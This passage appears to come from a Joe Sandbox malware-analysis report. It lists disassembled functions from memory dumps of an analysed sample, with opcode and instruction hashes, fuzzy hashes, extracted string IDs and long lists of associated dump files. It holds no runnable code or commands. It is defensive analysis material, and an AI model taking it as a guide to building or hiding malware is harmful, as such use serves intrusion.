                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                        • API String ID: 0-2471034898
                                                                        • Opcode ID: c8479c15b9ed3c2452bd64d4b8ed3af8453310a703de923b83e88fc50487e44e
                                                                        • Instruction ID: 710e2345e0d1804a476a6fef0fc2b8f4ac774a2db6c51fc73a646bdc07a6ec86
                                                                        • Opcode Fuzzy Hash: c8479c15b9ed3c2452bd64d4b8ed3af8453310a703de923b83e88fc50487e44e
                                                                        • Instruction Fuzzy Hash: B3513637E999B14BC7188D7C4C012AA6A531BD3330B2EC7A6EDB19B3D5C67B8C124391
                                                                        Function 006D0F55 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X$/
                                                                        • API String ID: 0-1692021601
                                                                        • Opcode ID: 7fe8e77f7e425fcabc1b26ef33cc151039993fe274909c18a53cf83962ffda29
                                                                        • Instruction ID: 06483e0728c3a88d2012294335fd01fce8210d60e55642c93006dd1c0c6460be
                                                                        • Opcode Fuzzy Hash: 7fe8e77f7e425fcabc1b26ef33cc151039993fe274909c18a53cf83962ffda29
                                                                        • Instruction Fuzzy Hash: 915153B3A0C7149BE308AE29DD8177BB7E9EB94720F16862EE1C5C7340EA7548418796
                                                                        Function 0062A083 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >ebg
                                                                        • API String ID: 0-4222723227
                                                                        • Opcode ID: 2f73533800725220e268f9f31ad0a8667ddeec145089d2f9553ae5761384776e
                                                                        • Instruction ID: 2e1f88519db5fbd47d3217d980a15ea48f6fcdca73a85101edd9a384c0f4654e
                                                                        • Opcode Fuzzy Hash: 2f73533800725220e268f9f31ad0a8667ddeec145089d2f9553ae5761384776e
                                                                        • Instruction Fuzzy Hash: 7A518B31958B618FC3208BA998802A7B7D3DF96350F09866CD5910B3D6D3B5CD49DB93
                                                                        Function 006DCF15 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {E~
                                                                        • API String ID: 0-3875335957
                                                                        • Opcode ID: fcbc383045cd015ae4f5d5f6099ebfc00322cbc43a259a4788426d05092ec995
                                                                        • Instruction ID: 0c1a14031a57b5e745a599d8cc1b466a0929f63f4be683b0f08d3e5d0afd4ae5
                                                                        • Opcode Fuzzy Hash: fcbc383045cd015ae4f5d5f6099ebfc00322cbc43a259a4788426d05092ec995
                                                                        • Instruction Fuzzy Hash: 7D4128B3A191004BF748AD3DED1976BBAD6EBC4320F2B863DDA95877C4E83558064285
                                                                        Function 00628290 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 45
                                                                        • API String ID: 0-2889884971
                                                                        • Opcode ID: 9a38aacda89e4e553a08be06a31d5f3049bb69177b524d2b3589447f37d947e2
                                                                        • Instruction ID: bd84a931a3b2618d7830ccbb59901f1695af0d8f81d64e1dbf2488b782aca66a
                                                                        • Opcode Fuzzy Hash: 9a38aacda89e4e553a08be06a31d5f3049bb69177b524d2b3589447f37d947e2
                                                                        • Instruction Fuzzy Hash: 9541AC76A48340CBE3209F25EC41BDBB7AAEBC6305F00947DFA489B281D73594098F85
                                                                        Function 0060BD50 Relevance: .8, Instructions: 822COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
